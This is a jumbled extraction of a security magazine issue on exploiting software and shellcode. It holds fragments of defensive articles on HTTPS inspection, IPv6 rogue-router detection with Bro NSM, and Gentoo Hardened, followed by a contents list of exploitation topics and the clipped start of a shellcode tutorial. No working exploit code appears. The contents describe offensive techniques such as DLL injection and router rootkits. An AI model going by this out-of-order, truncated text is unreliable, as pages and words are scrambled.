Transfer Protocol Secure (HTTPS) have been a safe method used by
attackers to bypass security inspection.
hough reverse proxies and Web Server modules

have been there for long, they only inspect
incoming traffic e.g. connections made to
protected web servers in the organization. Inspecting
outgoing traffic or traffic of connections made by users
to outside world servers not protected by the device, had
been on the wish lists. These days, devices come with
the capability to inspect Secure Sockets Layer (SSL)
based outgoing traffic, however there are some concerns
by enabling such kind of inspection. In this article we
cover some basics of SSL, the challenges in inspecting
SSL traffic, and also see how Check Points HTTPS
Inspection feature is able to inspect HTTPS traffic at the
gateway. After reading this article you will know the pros
and cons of enabling SSL inspection on a gateway.
Secure Sockets Layer (SSL) Basics
Protocols such as HTTP, SMTP, POP3 are plaintext i.e.

data carried by these protocols can be read by anyone
who is able to intercept the traffic while in transit. Since
these protocols are widely used over the Internet, there
is a need to secure them in order to protect users data.
By protection of data we are looking at confidentiality,
integrity and authentication.
Instead of building security measures in all the application

protocols, the Secure Sockets Layer (SSL) protocol
provides a secure channel below the application layer
thereby making it easier than to make an application
protocol a secure protocol. SSL is prominently used to
protect the HTTP protocol making it HTTPS. Today it is also
used to tunnel an entire network stack, creating a VPN.
The SSL specification was developed by Netscape
communications. After its version 3.0, a new Internet
standard protocol was defined and called Transport
Layer Security (TLS). The first version of TLS, version
1.0, was kind of an upgrade to SSL 3.0 with a few
enhancements. Most web browsers and servers today
support TLS 1.0, though versions 1.1 and 1.2 were
also defined later, many browsers and applications are
yet to support them. Throughout this article, we may
commonly refer to both, SSL and TLS, as SSL.
How SSL/TLS Work

SSL provides:
Confidentiality the data passing through SSL is

encrypted using a symmetric encryption algorithm
like DES, 3DES, RC4, AES etc.
Figure 1. SSL providing security below application and above

transport layers
186
Figure 2. Browsers display company name in green for Extended

Validation certicates
01/2012
DEFENSE
Detecting IPv6
Rogue Router Incidents Using Bro NSM
As IPv6 migration slowly gains momentum, situations where
administrators responsible for deployment of network equipment
have very poor knowledge and non-existent operational experience
of the new protocol are unavoidable.
hese situations are bound to cause information

security events of varying gravity. We use the
term information security here as defined broadly
by the CIA triad, CIA for confidentiality, integrity and
availability.
A well-known issue, the rogue router attack against
IPv6 protocol enabled network, exploits the router
advertisement (RA) functionality of ICMPv6 protocol.
A rogue router incident can be caused by malicious
attackers or through poor deployment and configuration
of IPv6 capable equipment. Rogue router attack can be
used to break the confidentiality of the data, availability
of Internet access from local area network (LAN) and
data integrity e.g. in form of data manipulation by the
rogue router. Thus affecting all three components of the
CIA triad
In this article we depict one method for detecting them
using open source Bro NSM. Bro Network Security
Monitor (Bro NSM) is a flexible open source network
analysis framework that is freely distributed under BSD
license.
Introduction
Internet Protocol version 6 (IPv6) has been a long time

coming. As the protocol is making its entrance several
security risks of varying criticality are known to exist.
However, the amount of skilled personnel needed to
assure the security of IPv6 network deployment as
well as awareness of the said risks remains woefully
low.
Here we concentrate on the one particular issue
that is caused by a particular ICMPv6 message in
a particular configuration and setting. The ICMPv6
is a much more critical component of the IPv6
protocol than its predecessor ICMP was for Internet
Protocol version 4 (IPv4). For example, in IPv6, the
functionality that was previously handled by the
Address Resolution Protocol (ARP) is now being taken
up by the Internet Control Message Protocol version
6 (ICMPv6). Total filtering and blocking of all ICMP
traffic did not cripple IPv4, but in contrast disabling
the ICMPv6 will discernibly hamper the functionality
of IPv6. ICMPv6 runs on top of IPv6, having its own
Listing 1. Partial icmp. bro listing of a development version

event icmp_router_advertisement(c: connection, icmp: icmp_conn)
{
print_log(c, icmp, "");

if ( |router_whitelist| == 0 || icmp$orig_h in router_whitelist )
return;
NOTICE([$note=ICMPRogueRouter,
}
192
$msg=fmt("rogue router advertisement from %s", icmp$orig_h)]);
01/2012
DEFENSE
The Gentoo
Hardened Project:
Or How to Minimize Exploits Risks
If you are reading this, then you might know what Gentoo Linux
is. If not, Gentoo Linux is a Linux distribution with plenty of years
of history and development. It was born on October 4th, 1999 by
Daniel Robbins.
entoos approach to Linux is evidenced in its

philosophy [1], from there it derives the fact
that optimization, flexibility and choices are the
keystones of the distribution. Gentoo gives users the
tools needed for them to shape their Gentoo installation
to their liking all the while building and compiling
software specifically for their hardware architecture,
not relying on pre-built binaries compiled by someone
else. That is one of the reasons why you will hear users
and developers, say that Gentoo is a meta-distribution
because the distribution provides exciting tools that
allow users, using the same base system, to build highly
secure servers, neat desktops, embedded solutions or
even a special VDR system.
Gentoo achieves this degree of flexibility through
its software distribution system, called Portage [3].
This technology allows the user to manage the local
collection of scripts, used by the package manager,
to install, update or delete software from the system.
This collection is called Portage Tree and has over
10,000 packages ready for the users enjoyment.
Since the distribution is based on source packages,
Portage can offer users great detail in the choices
they can make when building software for the target
machine. This is achieved by means of a special
mechanism called USE flags [3]. USE flags are
keywords that can be specified when building software
to select/deselect which features a package will be
built with.
For example, say you want to install a server without
a graphical user interface. It wouldnt make sense
to build software with features that use the X server
or bindings to Gnome libraries. Portage gives you
the ability to (globally, per-package, per-slot or perversion) disable all of those features for all packages
to be merged into the system.
196
Besides USE flags, Portage provides something

called system profiles. A profile, for short, is a set of
default values (e.g. predefined) for various important
environment variables that are used when building
packages. They set things like default CFLAGS,
USE flags, arch keywords and set a certain range of
acceptable versions for important packages. You may
think of profiles as recommended settings for building
and maintaining a system for a specific purpose (see
Listing 1 for a list of default system profiles).
Before getting into the nuts and bolts of how the USE
flags and profiles are related to the Gentoo Hardened
Project, lets take a look at what it is and what does it
offers.
Listing 1. Default system proles in a Gentoo system
kafka x86 # eselect profile list
Available profile symlink targets:

[1]
default/linux/x86/10.0
[3]
default/linux/x86/10.0/desktop/gnome
[2]
[4]
[5]
[6]
[7]
[8]
[9]
[10]
[11]
[12]
[13]
[14]
[15]
default/linux/x86/10.0/desktop
default/linux/x86/10.0/desktop/kde
default/linux/x86/10.0/developer
default/linux/x86/10.0/server
hardened/linux/x86
hardened/linux/x86/selinux
selinux/2007.0/x86
selinux/2007.0/x86/hardened
selinux/v2refpolicy/x86
selinux/v2refpolicy/x86/desktop
selinux/v2refpolicy/x86/developer
selinux/v2refpolicy/x86/hardened
selinux/v2refpolicy/x86/server
01/2012

EXploiting Software and SHELLCODE

Hochgeladen von

Dokumentinformationen

Copyright

Verfügbare Formate

Dieses Dokument teilen

Dokument teilen oder einbetten

Freigabeoptionen

Stufen Sie dieses Dokument als nützlich ein?

Sind diese Inhalte unangemessen?

Copyright:

Verfügbare Formate

EXploiting Software and SHELLCODE

Hochgeladen von

Copyright:

Verfügbare Formate

Dear Readers,

Top Betatesters: Nick Baronian, Rebecca Wynn,

The techniques described in our articles may only

10 Shellcode: From a Simple Bug to OS

The secret behind any good exploit is a reliable shellcode.

28 Exploiting Format Strings with Python

Format string attacks are not particularly new. Since

34 DPA Exploitation and GOTs with

If we can write into the GOT, we can effectively redirect

C++ programming languages; in particular, how these

42 Starting to Write Your Own Linux

We have seen more and more people become reliant on

48 Beyond Automated Tools and

Automated frameworks (including Metasploit) have

This article is going to follow from previous articles as well

62 Taking control, Functions to DLL

DLL injection is one of the most common methods

calls and returns. This article is part of a monthly series

By Marco Balduzzi and Mariano Graziano

80 Smashing the Stack 2

By Marco Balduzzi and Mariano Graziano

88 Exploit a Software with Buffer

Buffer overflow is an anomaly where a program while

98 Reversing EXE with OllyDbg

What is reverse engineering (RE)? Normaly, the source

102 A Quick Hands On Introduction to

On Windows systems, programs are usually available in

110 Hacking Applets: A Reverse

Ronnie and Nilesh will discuss a technique that can

learn how to patch byte code and perform other kinds of

116 Hijacking Software Updates with

Almost every modern application comes with a simple,

122 Direct Object Reference or, How a

There is no point in denying that everyday software

128 How to Recover Passwords from a

Malware analysis is an amazing field. To be able to grab

134 Creating a Fake Wi-Fi Hotspot to

We can use a standard laptop to create a fake open

142 Deceiving Defenses with Nmap

any suspect activity inside a medium/large network; the

150 Overriding Function Calls in Linux

Function hooking and overriding plays a vital role

156 Cracking Java Applications with AOP

Aspect Oriented Programming is a paradigm that aims

160 Cracking Java Applications with AOP

AOP has been used in the domain of Software Security

166 Cisco IOS Rootkits and Malware: A

Propagating the worm code into a new router can either

180 Easy Network Security Monitoring

Hackers and the malware that they create are getting

186 Inspecting Https Traffic on Gateways

In the past, security devices inspecting application

capability to inspect Secure Sockets Layer (SSL) based

192 Detecting Ipv6 Rogue Router

Internet Protocol version 6 (IPv6) has been a long time

196 The Gentoo Hardened Project:

Gentoos approach to Linux is evidenced in its

n this article Im going to teach you how to write a

Part 1: The Basics

Shellcode is simply a portable native code. This

The Three Types of Shellcode

Shellcode is classified by the limitations of the

Figure 1. Shellcode Skeleton

susceptible to the buffer overflow vulnerability. If your